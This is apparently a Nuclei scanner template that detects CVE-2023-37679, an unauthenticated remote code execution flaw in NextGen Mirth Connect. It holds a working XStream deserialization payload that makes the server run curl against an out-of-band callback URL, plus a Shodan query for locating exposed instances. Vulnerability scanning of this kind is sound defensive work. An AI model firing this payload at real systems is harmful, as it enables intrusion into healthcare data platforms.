76 lines
2.4 KiB
YAML
76 lines
2.4 KiB
YAML
id: CVE-2023-37679
|
|
|
|
info:
|
|
name: NextGen Mirth Connect - Remote Code Execution
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
|
|
reference:
|
|
- https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-37679
|
|
- http://mirth.com
|
|
- http://nextgen.com
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-37679
|
|
cwe-id: CWE-77
|
|
epss-score: 0.05809
|
|
epss-percentile: 0.92585
|
|
cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: nextgen
|
|
product: mirth_connect
|
|
shodan-query: title:"mirth connect administrator"
|
|
tags: cve,cve2023,nextgen,rce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /api/server/version HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: OpenAPI
|
|
- |
|
|
POST /api/users HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: OpenAPI
|
|
Content-Type: application/xml
|
|
|
|
<sorted-set>
|
|
<string>foo</string>
|
|
<dynamic-proxy>
|
|
<interface>java.lang.Comparable</interface>
|
|
<handler class="java.beans.EventHandler">
|
|
<target class="java.lang.ProcessBuilder">
|
|
<command>
|
|
<string>curl</string>
|
|
<string>http://{{interactsh-url}}/</string>
|
|
</command>
|
|
</target>
|
|
<action>start</action>
|
|
</handler>
|
|
</dynamic-proxy>
|
|
</sorted-set>
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'compare_versions(version, "<4.4.1")'
|
|
- 'contains(interactsh_protocol, "dns")'
|
|
- 'status_code_1 == 200 && status_code_2 == 500'
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body_1
|
|
name: version
|
|
group: 1
|
|
regex:
|
|
- '(.*)'
|
|
internal: true
|
|
|
|
# digest: 4a0a0047304502204c9ec054654d356663b4318f3308f541fde2e888e84ba6544585e2448a828b02022100bc74e59a67dd821151fb1f5dad5dd49f87f725baa3ec6c26bc0da2e2e5036614:922c64590222798bb761d5b6d8e72950
|